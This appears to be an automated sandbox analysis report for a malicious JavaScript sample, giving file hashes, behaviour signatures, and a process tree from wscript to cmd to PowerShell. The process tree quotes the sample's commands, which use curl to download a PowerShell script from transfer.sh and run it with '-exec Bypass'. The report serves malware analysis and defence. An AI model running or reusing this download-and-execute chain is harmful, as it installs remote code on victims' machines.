416293a2a049e175d85d418790035732eda8a055071d82d10f36a5bf6d9f246f

Analysis

max time kernel
45s
max time network
50s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
25-11-2022 18:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

File.js
Size

1024KB
MD5

e6ec998371e8e87c4fd54fab0753efd6
SHA1

78ffb07d87bdc791efdf6621df9a69552dc12a84
SHA256

416293a2a049e175d85d418790035732eda8a055071d82d10f36a5bf6d9f246f
SHA512

1beb3ac230a17cf5a383660447368744d8ce183edbf5eba27d6b466031cdde96025ea32ad14d8ae6be3f0535a6537e41d3b4ff09fadd6f27aca14e8b94f79bbf
SSDEEP

24576:NFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFo:

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1092 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1092 powershell.exe

pid	process
1092	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1092	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

wscript.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1448 wrote to memory of 1932	1448	wscript.exe	wscript.exe
PID 1448 wrote to memory of 1932	1448	wscript.exe	wscript.exe
PID 1448 wrote to memory of 1932	1448	wscript.exe	wscript.exe
PID 1932 wrote to memory of 1132	1932	wscript.exe	cmd.exe
PID 1932 wrote to memory of 1132	1932	wscript.exe	cmd.exe
PID 1932 wrote to memory of 1132	1932	wscript.exe	cmd.exe
PID 1132 wrote to memory of 1152	1132	cmd.exe	cmd.exe
PID 1132 wrote to memory of 1152	1132	cmd.exe	cmd.exe
PID 1132 wrote to memory of 1152	1132	cmd.exe	cmd.exe
PID 1932 wrote to memory of 668	1932	wscript.exe	cmd.exe
PID 1932 wrote to memory of 668	1932	wscript.exe	cmd.exe
PID 1932 wrote to memory of 668	1932	wscript.exe	cmd.exe
PID 668 wrote to memory of 632	668	cmd.exe	cmd.exe
PID 668 wrote to memory of 632	668	cmd.exe	cmd.exe
PID 668 wrote to memory of 632	668	cmd.exe	cmd.exe
PID 632 wrote to memory of 1092	632	cmd.exe	powershell.exe
PID 632 wrote to memory of 1092	632	cmd.exe	powershell.exe
PID 632 wrote to memory of 1092	632	cmd.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\File.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\GTA01.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
3⤵
- Suspicious use of WriteProcessMemory
PID:1132

C:\Windows\system32\cmd.exe
cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
PID:1152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
3⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\cmd.exe
cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GTA01.vbs
Filesize
111KB

MD5
ae6f5f99b79da73f4a5946b99638464c

SHA1
5dabcaf16267d88916091c8b969fab45e2780a2f

SHA256
839956f6240fdb2afed0556347dd1ecd8c375cbf5e8c017073bc87383e41a77d

SHA512
139210450bc7b580acb20a3f205ed15bb70ebc8779efbd5db31e8d77f8e37b396606d60ae87a8b8cce63e2a41666e54cec95d9a00f1959b96fa9047cb8624a8b

Download Submit
memory/632-61-0x0000000000000000-mapping.dmp

Download
memory/668-60-0x0000000000000000-mapping.dmp

Download
memory/1092-65-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp

Filesize
11.4MB

Download
memory/1092-62-0x0000000000000000-mapping.dmp

Download
memory/1092-64-0x000007FEF3FC0000-0x000007FEF49E3000-memory.dmp

Filesize
10.1MB

Download
memory/1092-66-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1092-67-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1092-68-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1092-69-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1132-58-0x0000000000000000-mapping.dmp

Download
memory/1152-59-0x0000000000000000-mapping.dmp

Download
memory/1448-54-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp

Filesize
8KB

Download
memory/1932-55-0x0000000000000000-mapping.dmp

Download